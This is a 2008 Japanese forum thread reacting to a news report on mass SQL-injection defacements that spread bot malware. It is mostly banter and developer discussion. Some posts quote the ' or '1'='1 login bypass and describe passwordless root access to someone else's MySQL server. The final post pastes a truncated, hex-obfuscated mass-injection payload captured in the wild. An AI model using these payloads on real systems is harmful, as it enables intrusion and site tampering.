【セキュリティ】SQLインジェクション攻撃が再び爆発増、ラックが緊急注意喚起 [08/12/22]

□SQLインジェクション攻撃が再び爆発増、ラックが緊急注意喚起 [08/12/22]

　ラックは22日、「改ざんされたWebサイト閲覧による組織内へのボット潜入被害について」
と題した緊急注意喚起を発した。SQLインジェクションによるWebサイトの改ざんが、
12月15日から再び爆発的な増加を示しているという。また、改ざんされた日本のサイトを
多数確認しており、12月19日以降、それを閲覧したことが原因と見られるボットが組織内に
潜入する被害も急増しているという。同社が12月に検知したSQLインジェクション攻撃は、
20日までにすでに181万9311件に達し、過去最高を記録した。

　ラックによると、改ざんされたサイトで悪用されている脆弱性は、マイクロソフトの
「MS06-014」と「MS08-078」のほか、「Adobe Flash Player」の脆弱性が確認されている。
これらの脆弱性が存在すると、ダウンローダーが動作して別の不正プログラムへの感染を
試み、これに感染すると、オンラインゲームのアカウント情報の詐取や他のサイトへの
SQLインジェクション攻撃などを行う。なお、このダウンローダーは、トレンドマイクロでは
「TROJ_AGENT.AGTU」として検知しているものだが、19日時点では未対応のウイルス対策
ソフトも存在したという。

　一方、ダウンローダーが感染を試みる不正プログラムは、ラックが確認したものは、
トレンドマイクロが「TSPY_ONLING.HI」として検知しているものだった。ただし、アクセスする
時刻によってアップデートされ、別の不正プログラムに変化することが確認されているため、
必ずしも検知できない場合があり注意が必要だという。また、影響範囲がはっきりしないが
組織内部の他の機器への感染活動や、外部から制御され、組織内の情報が詐取される
ことなども予想されるとしている。 （続く）

>>1
意味わかんない。寝る。

うっかり俺にレスしてしまった奴には
今年のイヴに黒髪ショートでミニスカロングブーツの美少年とデートをする呪いにかかります

>>1
　感染の有無を確認する方法については、「ダウンロードされるすべての不正プログラムを
検出する方法は現時点では不明」だが、間接的な方法として、外部サイトへのSQLインジェクション
攻撃を検出することなどで推測可能だとしている。このほか、改ざんによって誘導されるサイトを
リストアップしており、Webサイトの管理者に対しては、それらのサイトへの誘導スクリプトや
iframeタグが埋め込まれていないか確認する方法を紹介するとともに、改ざんされていた
場合の対応手順を説明している。

http://internet.watch.impress.co.jp/cda/news/2008/12/22/21950.html　（引用元配信記事）
http://internet.watch.impress.co.jp/　INTERNET Watch　[08/12/22]　配信

ニュースリリース〜LAC（Little eArth Corporation）[08/12/22]
【緊急注意喚起】改ざんされたWebサイト閲覧による組織内へのボット潜入被害について
http://www.lac.co.jp/news/press20081222.html　
2008年も「脅威はWebからやってきた」、ラック新井氏　2008/12/18 17:52
http://internet.watch.impress.co.jp/cda/news/2008/12/18/21915.html
※関連ニュース
【緊急レポート】日本国内でも始まっていたIEのゼロデイ攻撃　[08/12/22]
http://internet.watch.impress.co.jp/cda/special/2008/12/22/21937.html

ああなるほどね

見なかった事にする

はいはい悪い子ですよ。

みんなこれを機に農業生活だな。
ITは国を滅ぼしますね。

またチョン共か

僕の肛門も爆発しそうです

>>3

むしろ喜んで
というかYokoseeeeeeeeeeeeeee!!!!!!

>>1
日本語で頼む

結論：CSVが最強

で、デモコードはどこ？

インクジェットプリンタの事を、インジェクションプリンタだと思ってました。

やわらか戦車見てたら２分ぐらいでwindowsxp落ちるんだが

こいつのせい？

>>3
この際だから、細かい事には目をつぶろうじゃないか

コマンドファイルの名前を変えるか、削除したほうがいいよ。

怖いなぁ。
会社のＰＣで迂闊なページ見れんな。

はいはいＩＩＳね

flash使うなってことか

確かに企業HPのflashは、うぜーよな

かれこれ1年近くアメリカのセキュリティが緩いことで有名な
ケーブルTVプロバイダからアクセスされ続けとるんだが

亜種が検知できない有料ウィルスソフトって、残業しない公務員みたいなもの？

わしが連鎖場にインスコしたＣＭＳは大丈夫でせうか？

何？クエリ？？

flash問題はハッカーの大会で優勝したチームがVista相手に使った手法だね
その大会ではUbuntuが最後まで生き残ったらしい

>>11

【社会】ボーイズラブ本を18禁扱い→「住民グループ」が猛反発→18禁扱いを解除 - 大阪・堺市図書館★２
http://mamono.2ch.net/test/read.cgi/newsplus/1230030542/

どうぞこちらへ

セキュリティに甘いサーバー管理者は、それだけで逮捕とかできるように
すべきじゃないか？

僕の肛門もセキュリティホールです＞＜

DB上のユーザを一つでやるからでしょ。
ちゃんと、実ユーザ用のアカウント作ってロールを厳密に設定しなきゃ。

サニタイジングを忘れずにね＾＾

ＩＴ技術者大量解雇したからだろ

>>3
今の彼女より黒髪美少年に惹かれるものがあるな

今頃SQLインジェクションかあ……

サブプライム崩壊で失業した情報工学の天才がやってんだよ。

17 名前: 名無しさん＠八周年 Mail: sage 投稿日: 2008/05/18(日) 14:31:58 ID: LJwwtkd80
↓以下スーパーハッカーの書き込み
18 名前: 名無しさん＠八周年 Mail: 投稿日: 2008/05/18(日) 14:37:49 ID: 7CCzt+ru0
いま嫁のセキュリティホールに侵入してきた
19 名前: 名無しさん＠八周年 Mail: sage 投稿日: 2008/05/18(日) 14:39:29 ID: AxhPYa950
おまえの嫁にセキュリティホールなど無い
20 名前: 名無しさん＠八周年 Mail: 投稿日: 2008/05/18(日) 14:40:18 ID: /DhMqSHd0
お前の嫁にバックドアなら俺が空けといた
21 名前: 名無しさん＠八周年 Mail: sage 投稿日: 2008/05/18(日) 14:40:35 ID: jQGlAU/A0
おまえの嫁のセキュリティは脆弱
23 名前: 名無しさん＠八周年 Mail: 投稿日: 2008/05/18(日) 15:01:53 ID: LBvLt4St0
お前の嫁にウイルスもらった

漏れなんて、パソコソには、幼女のエロ画像しかないから、誰に見られても全然平気。

>>36
ちくしょう、最後のウイルスでふいちまったｗ

BABELBABELBABELBABELBABELBABELBABELBABELBABELBABELBABEL
BABELBABELBABELBABELBABELBABELBABELBABELBABELBABELBABEL
BABELBABELBABELBABELBABELBABELBABELBABELBABELBABELBABEL
BABELBABELBABELBABELBABELBABELBABELBABELBABELBABELBABEL
BABELBABELBABELBABELBABELBABELBABELBABELBABELBABELBABEL
BABELBABELBABELBABELBABELBABELBABELBABELBABELBABELBABEL

SQLサーバ側の穴じゃなくてMSとADOBEの穴なのね。

>>36
最後のでﾜﾛﾀ

てか今年退社したIT会社じゃSQLインジェクションって言葉すら知ってるは稀だった。
イントラ内とは言えWebサービス作ってる技術者達とは思えなかったな。
制御系でWeb専門外の俺ですら知ってる基本事項なのに・・・。

つかこれが日本のIT業界の実情。

>>28
そもそもソフトに未曾有のセキュリティホールが存在してるからなぁ・・・ゲイツ逮捕でｗ

>>42
セキュリティ関連は、また開発とは別の分野になるから、教育体制がしっかりしてないとこは、そんな感じだよな。
お前が勉強家なだけだと思う。

>>36
笑ったｗ

>>42
そりゃあここ数年でがんばってベテラン抹殺したし
生き残ったやつは仕事など教えないからな

サニタイズ(笑)

MSから送られてきたアップデートで無限再起動地獄に叩き込まれて、
データ全部失った事件に比べれば、なんともないぜ

>>43
いやSQLインジェクションはプログラミングの時点で対応するのが一般的。
入門レベルの本やホームページではそこまで解説してないほうが多いが
プロとして開発する人には常識レベル。

知らない人は自分の作ったものがハッキングされるなんて想像もしてないんだと思う。

用語は知らなくともまともな頭があれば学生レベルでもエスケープするけど

>>1
ＰＧだけどホストなのでちんぷんかんぷんだ

ＳＱＬって結局ＶＯＢだしな。やりかたがまずいよ。
もっとＫＫＬ的なＦＭＦを、もっと言ってしまえば「ＤＳＸ」を
基本ＣＷＷとすべき。

>>39


パトレイバー乙

日本IBM乙

やっぱりホストが一番ですよ
WEBなんていらねえ情報ばっかでネットワークの負荷がかかるし
セキュリティの問題もあるしろくなもんじゃないね

業務システムをwebで作るメリットは正直わからん
今もインタフェース作りこまれたwindowsアプリの既存システムをwebでリプレースしてるけど、
操作性はどう考えても落ちるんだよ

>>55
保守が楽だろ。プログラム交換とか。

>>55
まあ、ブラウザがインストールされてないPCは皆無と言っていいから、そこはメリットだろう。

全然意味わからないけど
人ル画滅ぶ可能性があるってこと？

>>56
でも業務システムなら環境だって前もってわかってるだろ
そこまでのメリットに思えん
それにjavascriptで作りこまれたインターフェースの保守性はどうなるんだよ
あんなもんの改修なんて絶対にやりたくない
でもjavascript使わないと紙芝居みたいなのしか作れない

ＰＧ板とかＩＴ系の掲示板で「ＳＱＬインジェクションでサイト改ざん」
とか書いてる人がバカにされてるの見かけるけど

ＰＧ板とかＩＴ系の人たちはこのニュースの裏の何かを知ってるのかしらん？

き・・・脆弱性

javascriptとかphpなんてゴミで開発させられる技術者が可哀想です

日本語で書け！

まだ今はいいよ。
ちょっと昔なんてwebでシステムつくっても
PCが統一されてない環境の会社なんかだと
スペックによってはちょっとテキストボックス増やしただけで
リソース食いまくりで画面が崩れて使えないってのがあったからな。

しかも、勝手に上司（爺さん）が客先とイントラでやるって約束しちゃまったから
ユーザからは操作性は落ちるは、1画面で入力できるレコード数は落ちて使えないはで
さんざん文句言われた。全部おれのせいだよ糞

>>59
それはプログラマ的発想

>>48
そうか？
＞入門レベルの本やホームページではそこまで解説してないほうが多いが
＞プロとして開発する人には常識レベル。
普通の人は勉強しないって。。。お前が勉強家なんだよ。
ほんと、教えないと何も出来ないのが多いからな。

>>51
わろたｗｗｗ

何でラック社は危険なのはWindows鯖って言わないの？？？

>>48
常識レベルになってないから改ざんされまくるんじゃね？

>>59
javascriptとhtmlが理解できれば、javaでもＰＨＰでもなんでもＯＫだからかな？

>>65
まあ全国の分散拠点50箇所で使います、とかならわかるけどな
でもそんなのって既存でwindowsアプリで動いてるわけないだろ
1箇所の事業所の、２，３部門だけで使うんだぜ
マジ意味不明

oracleが一番糞だ

>>55
ブラウザで使えればいいって縛りだけで
M$に縛られるリスクが低減するだろ

>>60
そりゃ被害を受けてるのが全部MSのサーバソフトだからだろ

>>67
他のがもっと危険だから。

>>1
>オンラインゲームのアカウント情報の詐取

もうコレだけで中国製ウィルスと特定できるｗ

>>59
それって、ＩＴ時代に流行った「動作環境選ばず！」の流れだからねぇ〜
当時から疑問だったが、誰も聴く耳持たずで、俺は白い目で見てたよｗ

>>3
あ、うっかりしちゃった。

おまいらには失望した

【レス抽出】
キーワード：ザク
抽出レス数：0

キーワード：ｲフリート
抽出レス数：0

>>66
SQLインジェクションは４、５年前に結構話題になったし
専門外でも普通知っているもんかと思ったよ

>>59

metaframeとか使ってくれれば楽なんだけどね

一昨日のサンワサプライのHPがめちゃ重かったが
これが原因か？

カスペルスキー先生にウィルススキャンを今お願いしてるが。。。

>>71
その割にはExcelやらWordやらでの帳票出力機能があるんだよｗｗｗ「Excelは必要です！」ってお前ね、Excelは表計算ソフトなんだから計算させてやれよ、表作成ソフトじゃねえんだよ
まあいいよ俺は作るのが仕事だからさ

>>75
ホント、ただの流行だよね

>>78
知ってても開発用件に「ＳＱＬインジェクションは防いでね？」とか書いてないとなんもしないんだと思うよ。


>>75
流れは動作環境選ばず、だがしかし動作環境は固定なんよね
ＩＥ６で動くように、それだけ考えて作ってたらＩＥ７で表示崩れておよよよよ

パスワードの所に
' or '1' ='1
とか入れると入れちゃう商用サイトも昔は結構あった、
そういう所に限って、IDはadminとか、administratorとか
だから困るwwwww

SQLインジェクションってセキュリティ考えるときの
イロハのイだったような？？

>>82
「なんかね、誰かが勝手にIE7にしたみたい。それはどうでもいいけど画面汚いから直してよ」

>>31
＞サニタイジングを忘れずにね＾＾

御大が、「サニタイジング言うな」キャンペーン張った
効果は出てないなｗ

>>85
お金くださいｗｗｗ


>>86
そんなキャンペーンあったんすか？

エスケープ処理と云えってか

汚物はサニタイズだー！

>>82
狐用とIE6用とIE7用のCSS用意しておいてね＾＾）

>>83
通報しません

システム境界での要求決定は難しいから念入りにしませう
って慣習はあるんだけどその辺の設計を練らんまま素人の集りでしかない実装部隊に投げておうのぅっていうオチ
でも上にはその素人達はエキスパートの集りって知らされてるという

>>90
建前：ｃｓｓ複数作るの大変なんですよ、お金ください。
本音：スタイルほとんど直書きしてたｗｗｗｗ

新手のSQLインジェクション攻撃を実行するボットを確認しました。この攻撃は、マイクロソフト社製の
WebサーバIIS/ASP/ASP.NET上で開発されたWebサイトを狙ってデータベースの改ざんを行います。

今回のSQLインジェクション攻撃では、IIS/ASPの仕様を悪用し、挿入するSQL文を工夫することで、
IDS/IPS/WAFなどの防御システムを回避する

http://www.lac.co.jp/info/rrics_report/csl20081002.html


これSQLインジェクションへの攻撃って言いながら、実際はMSのASP仕様のアラが狙われてるだけじゃねーかｗ

全ブラウザ対応してもギャラ同じだからたまらん。
マイクロソフト、この不景気で潰れてくれればいいのに。

っていうか、ＳＱＬ注入の被害受けるって、ＳＱＬ文を文字列として
組み上げてるって事なの？

>>87
ぐぐると出てくるよ。
高木先生がかなり熱を入れて主張してた。

>>94
あはーん

ＩＴ系とかＰＧ板のえらい人たちはそれを理解してたのね。
>>72もありがとう。

>>92
確かにｗｗｗ

>>94
あまりにもセキュリティーホールが多過ぎて、ＭＳが意図的にやってるとしか思えないよな。
ＶＵＰでデグルのはまだ許せるとして、ＯＳ変わったらホールが復活してるのが、一番許せんｗｗｗ

>>94
MS製品普及してるアノ国の支那人が暴れてるからでしょ
同じ原理でＯｒａｃｌｅもクラック可能

>>94
＞IIS/ASPでは、%に続く文字が16進数表記できない文字列が続いた場合、%を除去して、WebアプリケーションにSQL文を送り込みます。

ちょ、何だそれｗ
勝手な事すんなｗ

IIS（笑）
MS SQL（笑）
ASP（笑）
.NET（笑）

うちの会社は、システム更新時にセキュリティー監査受けて、定期セキュリティー監査もやってる
一部システムはWAFも入ってる

>>92
無能な上流工程の人たちが、無能な下流工程の人に投げる

無能の連鎖

>>100
そんなセキュリティ機能があるから

「IIS/ASP」を使っていれば業務では何もしなくても大丈夫です（キリッ

ってことになってんのかなｗ

Microsoft（笑）

こいうのって被害受けたらマイクロソフトに損害請求できないの？
何のために高いサーバライセンス払ってんだか意味わかんねーよ

>>105
できない。できたら今頃ＭＳが存在して無いな。
てか、ＭＳのソフトだけ動かして被害が出ても請求できないからな〜

>>106
金払ったのに全て無保証・自己責任ですか！すごい商売ですねｗ

「MicrosoftはXbox 360の欠陥を認識しながら修理を見送ったことが裁判資料で判明」
http://itpro.nikkeibp.co.jp/article/NEWS/20081219/321777/

本当にスゴイ会社ですね。。。

まあ消費税集めて（つまり万人に課税して）無保証・自己責任って言い放つ政府もあるし、
そういう世界なのさ。

Windowsに変わってから免責事項の確認がやたら長くなった時は、何事かと思ったけど、接してみるとその意味が理解できた。
余りにもアプリやOSが落ちまくって仕事にならない事が多々あったｗｗｗ

PGなんてやったことねぇって人間がWEB系の開発で一人前になるのってやっぱ時間かかるの？
昔のような1言語で済むような環境に比べれば大変だとは思うけど

その反動でもっとシンプルな環境とか出てこないのかな？

むしろ今だにWindows鯖でサイト立ち上げてるやつがいることの方が驚き。

>>111
VBとかでおかしなクセがついてない分、かえってすんなりいくかもね。

このお得意の戦法は・・中国かｗｗ

>>1
ふーはー

>>113
でもなぁ、開発環境の全体像が見えるのに時間かかるでしょ？
前からやってる人間は複数の言語が混ざろうがすぐ読解出来るけど
HTMLさえ始めて見たって人間にソース見せても最初混乱するだけだと思うけど
「何でこんなに複数の言語があるんだよ！JavaScriptとかCSSなんて最初からHTMLで吸収しとけよ！」
とかさぁ

これはもう古典的な攻撃で対策してないサイトがアホだと思うけどね

>>111
とりあえず、JAVAとJSPとHTMLとjavascriptとstrutsとSQLが使えれば大丈夫じゃない？
PHPも使えて損は無いかも。
あ、バッチもやるならシェルとperlも？

あー、もう新しい言語覚えたくねー

>>114
もう物理的にケーブルを切ったほうが良いのかもしれんね

>>1
>ただし、アクセスする 時刻によってアップデートされ、
>別の不正プログラムに変化することが確認されている

よーするに、タミフルは効かないと。

脆弱性ってなんなのかしら？
おしえてたもれ

>>117

確かにMSの仕様のいい加減さは、ユーザーに対する古典的な攻撃だよなｗ
これはMS製品は使わないという簡単な方法で防御できる。

「MS06-014」と「MS08-078」

ジオン軍かと思ったのはもれだけではないはず。

>>123
俺も反応したけど、話題が見当違いな方向に進むから黙っていたのに・・・

インジェクションか。これからの季節は美味いよね。

>>96
高木って何したやつ？
何もしてないのに声だけでかいやつだろ？

>>126
おまえよりは仕事をしてる人

外の口あけてない社内ツールだから別にいいよね？
むしろSQL文を打てるテキストエリアまであるんだけど･･･社内だからいいよね

>>128
だれかが持ち込んだUSBメモリ→Windows PCに感染→イントラのWIndows鯖に感染
→社内全PCに感染

>>127
いや、確実にしてないよ
ブログ更新する暇あるんだし

>>130
2chに書き込んでる奴に言われたくないと思うぞｗ

>>131
馬鹿野郎お前
２ちゃんより圧倒的にブログの方が時間使うぞ
ネタ探しやら何やら

それに２ｃｈに書き込む仕事だってあるしな

>>111
GUI作るのと、そのための資料がwebにわんさか落ちてるから、
結構楽なんじゃね？

>MS06-014」と「MS08-078

ザクとイフリートですね？
わかります。

黄金聖闘士の技かなんかですか。

セキュリティ業界も不況で、また煽り系になってきたな・・・ラックまでもがつぶれそうなのか？

ソースコードは公開しない。
我々のソフトに欠陥はない（日本の原発は安全です、ににてる）。
トラブルが起これば「我々に任せてください」。
導入にもサポートにもめちゃ金がかかる。

なんかMSの製品使うって「私はマゾです」って
言ってるみたいだなあ・・・。

アメリカみたいにＩＴ技術者は免許制にしたほうがいいよ
大学で博士課程を修めた人だけなれるようにしないと馬鹿ばっかだから

firefoxの欠陥を見つけたお
JavascriptでPOST出来やがるお

利用したサイトも見つけたお
表示しただけで掲示板にスパム書き込みするお

Windows鯖（笑）

>>3
呪ってくれぇ！！！！！！！！！！！！！

>>36
ハニートラップかw

いろいろ終わってんなMS

SQLインジェクションなんて、真っ先に対策するべきところだろ･･･

>>146

突かれてるのはMS様のIIS/ASPの仕様。汎用的な話じゃない。
http://www.lac.co.jp/info/rrics_report/csl20081002.html

そんなに問題あるのに
Windows使って
LINUX使わないのは
何故?

>>148
ぎょーむソフト

Web鯖みたいな外ネットワーク向きに置く物をわざわざWIndowsにするバカ管理者。

サウンドハウス？

フラッシュとか頭悪そう過ぎる

>>148
やらかしてしまった時に客に「MSがやらかしてくれました」と報告できなくなるから。

>>153
そんなこと客にいっても、知ったこっちゃねぇ早く何とかしろでオシマイ。

>>154
そして担当者あぽーんですね？わかりますｗ

Outlook2007とかMSのメル鯖つかわないと腐った挙動をするソフトを
なぜか企業は使いたがる。

マイクロソフトはSQLインジェクション対策してないベンダーが悪いなんてシラ切ってたけど、
結局お約束のセキュリティホールｗ

マイクロソフト、「SQL Server」の脆弱性を調査中
http://japan.cnet.com/news/sec/story/0,2000056024,20385762,00.htm

>>94
これは簡単だな・・・

unixとかlinuxとか開発運用にコストかかりすぎる
そこらの安いプログラマ使えないじゃんｗ
だからって自前で面倒見るほど暇じゃなし

つか大したことするわけでもないのにDB使うなよ
csvでやれ

>>159
カンタンなWindowsという宣伝に乗せられて、信頼という取り返しのつかないものを失う典型的なパターンだな。

この間、この問題のせいでソフ開の午後�Tやばかったｗｗｗｗ
受かったけど。

なんか上の方でレスあるけど、ソフ開持ってるような人間でも、
試験で初めて知ったりするんだよ。

そんなもんです……俺の専門AIだし。
てか、おまいら詳しいな……どっから知識しいれてくるんだ？

おまいら、まだ Windows 使ってるのか？
LINUX ならバグが無いから安心だぜ。
金払ってバグだらけのＯＳ使うって、頭悪すぎ！

Linuxのが事故が多いけどね

>>162
web系の開発者くらい腐るほどいるだろ。

サニタイズとか言われるとなんのこっちゃとか思うけど
要はパラメータのチェックしてないつーことじゃないの？

>>147
いや、結局WebアプリにSQLインジェクションの脆弱性がある前提なんで
汎用的な話よ

とりあえずハッキングされた靖国のHPを見た
ぼくのPCはだいじょうぬでしょうか？

これに引っかかるのって、要するにWAFに頼りきりでアプリ側はザルだったってパターンか。
WAF入れるような所なら普通アプリ側でもSQLインジェクション対策くらいしてるだろうし、偉いレアなケースっぽいな。

>>169
いや、まともにWAF設定してれば
とりあえずこの件は防げる

やられてるのはアプリがザルでWAFもないやつ
でも世のサイトの半分はそういうサイト

>>168
Javascript切ってたら大丈夫

>>162
AIって、Adobe Illustratorじゃなねーだろうなw
知識は仕入れるんじゃなくて、自分で研究するんだよ。なんでも他人まかせなバカがはまってるだけの話だ。
SQLインジェクションなんて10年以上前からフツーに対策してんだよ。

>>172
＞知識は仕入れるんじゃなくて、自分で研究するんだよ。
使うモノのソースを全て読んで、
「この関数で文字列をエスケープしようとしていたが、ここで採用されている方法では
例えばshift-jisの「表」という字が含まれていた場合にそれにもバックスラッシュを
付与してしまうため、逆にエスケープ仕損なう文字が出てくるな。危ない所だった」
とか気づける人……？ありえんw
もちろん、問題が生じた時に原因を探れるのは重要だが、
一人で研究するより、まずは情報を仕入れる事に力を入れるべきだろ。

マイクロソフトはSQLインジェクション対策してないベンダーが悪いなんてシラ切ってたけど、
結局お約束のセキュリティホールｗ

マイクロソフト、「SQL Server」の脆弱性を調査中
http://japan.cnet.com/news/sec/story/0,2000056024,20385762,00.htm

ストアドプロシージャー

ＷＥＢプログラム側がｲﾝｼﾞｪｸｼｮﾝ対策してれば防げるなら、ＤＯＳ攻撃まがいのトラフィックだけの問題になんのこれ？

俺の理解が間違ってなければWindowsのセキュリティホールをついてトロイを仕込み、
個人のＰＣを踏み台にしてＳＱＬインジェクション攻撃をＷＥＢサーバにかけるって事だよね？

>>177
他人の無線LANでやったほうが手っ取り早いよ

e-arpaも改竄されてたな。
もう復旧したけど何の説明もなくてワロタｗ
サイト管理者は脳みそも改竄されたらしいな。

やべーうちの自宅mysqlサーバroot権限パスワード設定してない。

>>180
MS SQL Serverじゃあるまいし、mySQLはmySQLユーザで動いてるだろw

だから LINUX にしとけばよかったのに。

>>181
デフォルトで管理権限を持ってるのが root って名前でパスワードなし。
どっからでもアクセスできるわけではないが。

>>183
何？？それは重大なセキュリティーホールだな！ＭＳ並みにひどい！

>>183
rootでパスワード無しって、逆にどんなパスワード入れてもrootでログイン出来ないってことでセキュリティ的には最強なんだがw
実際OS Xや最近のLinuxディストーションはそういう形になってる。

↑
パスワード入れなきゃいいやん。

>MS06-014
どこのモビルスーツだ？

ザクゲルググ？

>>184
初期設定をせずにサーバを立ち上げる管理者は
たしかに重大なセキュリティホールだw
XAMPP を入れて、使う予定のない MySQL も一緒に起動してて
PHPMyAdmin の画面が外から丸見え、みたいな自宅鯖は結構ありそうだが。

>>185
OS のユーザの root じゃなくて、MySQL の user に root が入ってるんだよ。
MySQL のパスワード未設定は、パスワードなしでアクセス可能ということ。

おまいらホント詳しいな。
全員がプロってわけでもなかろうに。

なにいってんのかわかんねぇ
誰か1行で説明よろ

>>188
意味不明すぎw

インストール直後の初期設定のまま使うと誰でもログインできちゃうってことだよ。

>>180
実は俺も　　ｗｗ偽管理者や。

というのは、apacheの.htpasswordの簡易認証と併用ができんのよね。
よって、現状phpMyAdminにログインする場合は、basic認証の方に
しているという・・・。（当然アクセス制限しているがあくまでphpmyadminな話）
直接ポートからMYSQL叩かれりゃむき出しだ。

ま、自ら穴空けているともいう。

ただ、この状態で3年近くアクセスログで様子見ているが、root奪われた
形跡も奪われた形跡も一切無い。ふむ・・・・mysqlには関心が無いのかな・・。

＞あなたのコンフィグレーションファイルの設定が MySQL デフォルトの特権
＞アカウントになっています (root ユーザーでパスワードなし) 。
＞MySQL サーバーもこのデフォルト設定で動作しているので、侵入者に
＞対して無防備です。このセキュリティーホールは必ず閉ざしてください。

>>193
あのー、MySQLがデフォでインストールされてて何の設定もなしにデーモン起動になってる
ってどのディストリ？ｗｗ

phpMyAdminてrootにパスワード入ってなかったらアラートでなかったっけ？

ちなみにインタプリタから、他人のMYSQLのデータベースに
アクセスできます。ま、普通に -hオプション付けりゃいいわけで
自分みたいに管理者rootでパス無しだと、 -uでrootと入れりゃ
管理者権限でmysqlにアクセス可能です。（削除もテーブル追加も
なんでもし放題）

>>195
出るよ。

＞初期設定のまま使うと誰でもログインできちゃう

ＳＱＬサーバに限らず、こいつが最も危険なセキュリティーホール。

>>190

簡単にいうと半可通に限ってWindowsで鯖立ち上げたがって、その結果大惨事起こしてるってこと。
MSはそういう半可通をカモにして商売してるが、Windows鯖導入の結果何が起こっても一切知らん顔
「自己責任」でヨロ〜と。
何のために高いライセンス費払ってんだかｗ

Win鯖の場合、デフォでサーバ管理者ID＝IIS管理者＝SQLサーバ管理者というアホ仕様。
だから、SQLの穴突かれて進入されると、本来無関係のはずのサイトコンテンツの書き換えから、
スクリプトの書き換えまで自由自在ｗ
ハッカーにとっちゃやりたい放題の天国環境。

Flashなんて危弱性高すぎて糞だろ。
裏でどう動いているか分かったもんじゃない。

>>200
以前にあった楽器通販サイトの個人情報流出もモロそれだったな。

こういうのってどうやって勉強するの？

>>203
WIN鯖の管理者となり、クラック受けて解雇されると嫌でも身につきますｗ

http://entacom.org/clockup/product/samen/top.htm
これ入れておけば問題なしって本当？

>>203
IPA のサイトに原理やら具体的な対策やら書かれた資料がいっぱいあったりする。
特定の製品に由来する問題は JVN やら IPA やらの出す情報を定期的にチェック。

Windows鯖の管理者だけは勘弁してくれ。ウンコ仕様のおかげで常識じゃ起こりえない
ようなことがまかり通って毎日が綱渡り。まじで盆暮れ正月がなくなる・・・

>マイクロソフトはSQLインジェクション対策してないベンダーが悪いなんてシラ切ってたけど、
>結局お約束のセキュリティホールｗ
>
>マイクロソフト、「SQL Server」の脆弱性を調査中
>http://japan.cnet.com/news/sec/story/0,2000056024,20385762,00.htm
>
>

LINUX なら絶対にバグが無いから安心だよね。

>>209
それは違うと思うぞ・・・

>>209
日々流れてくるパッチはなんなんだぜ？

>>209
バグのないソフトウエアなんて世の中に存在しない。それは見つかった時点で潰していくしかない。
MS製品の問題は、セキュリティーホールとなってるものがバグじゃなくて「仕様」だったりすること。
そのためセキュリティーパッチを充てると仕様が変わって、それまでのプログラムが動かなくなったりする。
で、作り直し→結局コスト2倍、とw

まあ、MSつーか、アメリカの企業のは結構多いよな。
オ○クルなんかも、クソ高い金を取っておいて、明らかにバグなのに仕様だって言い張ることがあるし、

>>213
みんなやってることだからMSは悪くないってか？
最近よく聞く詭弁だなw

これって靖国神社HPハッキングと関係あるの？

ええええええ〜〜〜っ？？？

　　　バグ＝仕様

違うの？

ｗ

これはひどい

どうやったらＷＡＮ側からＳＱＬを発行出きるんですかね？
その時点で管理者あほなんじゃないかと

>>219
WAN側て……。直接データベース鯖にアクセスしてるわけじゃないから、
攻撃者のホストがどこかなんてのは関係ない。

>>219は釣り師

釣りにもならん

>>1
MS06-014
MS08-078

モビルスーツの型式みたいだな

こういうスレあると、ニュー速＋民は脊髄反射で書き込んでるのがよくわかる

予断するべからず。油断するべからず。

つかWin鯖でサイト構築とか、そんなにしにたいの？

VBでしかシステム組めない会社とかあったよ。
昔だけど。
今もあるんだろな。

>>227
今どきどんな会社だよｗ

VB（笑）

ニュースサイトのフラッシュムービーとかヤバイぞ。

以前、ニュースサイトにアクセスしたら、
abobeのアップデートのメッセージが表示され、ＯＫをクリックしたら感染したっぽい。

基本的にクライアントサイドで動くスクリプトの類は走らせない、これに尽きるな。

>>231
ということはtomcatの出番だな。

>>232
tomcatだけではこのインジェクションに対応できないような…

そもそもインジェクション噛ますのにスクリプトは必要ないです

>>234
今回のインジェクションの特徴が、インジェクションによって外部スクリプト
へのリンクが埋め込まれるから、ユーザ側から見て>>231に書いただけだよ。

Links最強伝説の始まりですね

>マイクロソフトはSQLインジェクション対策してないベンダーが悪いなんてシラ切ってたけど、
>結局お約束のセキュリティホールｗ
>
>マイクロソフト、「SQL Server」の脆弱性を調査中
>http://japan.cnet.com/news/sec/story/0,2000056024,20385762,00.htm
>
>

>>235
その通りだよ
Javascript切ってたら
今回のインジェクションによるマルウェア感染はない
でもJavascript切ってたら
いまやほとんどのサイトがまともに閲覧できない

>>235
そうだろうなとは思ったが、言葉が足りないので違うかもしれないと思ったんよｗ

俺も基本ｊｓｏｆｆだもの

だからパラメタライスドクエリを使えって。
ほんと派遣プログラマや中国人は使えないな。

>>239
言葉足らずでｽﾏｿ
うちの鯖にもこれ来てるよ、declare

新手のSQLインジェクション攻撃を実行するボットを確認しました。この攻撃は、マイクロソフト社製の
WebサーバIIS/ASP/ASP.NET上で開発されたWebサイトを狙ってデータベースの改ざんを行います。

今回のSQLインジェクション攻撃では、IIS/ASPの仕様を悪用し、挿入するSQL文を工夫することで、
IDS/IPS/WAFなどの防御システムを回避する

http://www.lac.co.jp/info/rrics_report/csl20081002.html


これSQLインジェクションへの攻撃って言いながら、実際はMSのASP仕様のアラが狙われてるだけじゃねーかｗ

>>242
ＡＳＰ仕様って言うか、もうＰＧの責任でいいでしょｗ

こんだけ騒がれてて未だ知らない奴とかいるのかｗｗ

>>243
>もうＰＧの責任でいいでしょ

マイクロソフトはそうことにしたいらしいけどねｗ

>>243
ＰＧに責任はねえよ

ＰＧは言われた仕事をやるだけ、ＰＧに「ＳＱＬインジェクション対策しとけよ」と言わないＳＥが悪い

言ったとしても、対策してるか確認してなけりゃやっぱりＳＥが悪い

>>245
オレがSIだったら担当SEに外ネットワーク向けの案件にMS製品は使うなっていうね。
それが一番手っ取り早い対策ｗ

>>242
いや、どっちにしろアプリの脆弱性ありきが前提
アプリでそのままSQL文に突っ込むから問題
アプリに脆弱性がなければその方法も無理

↓うちに来たクエリのサンプルね

辛卓;dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(
0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F4
37572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320
612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E7
8747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F5
0454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404
3205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D205345
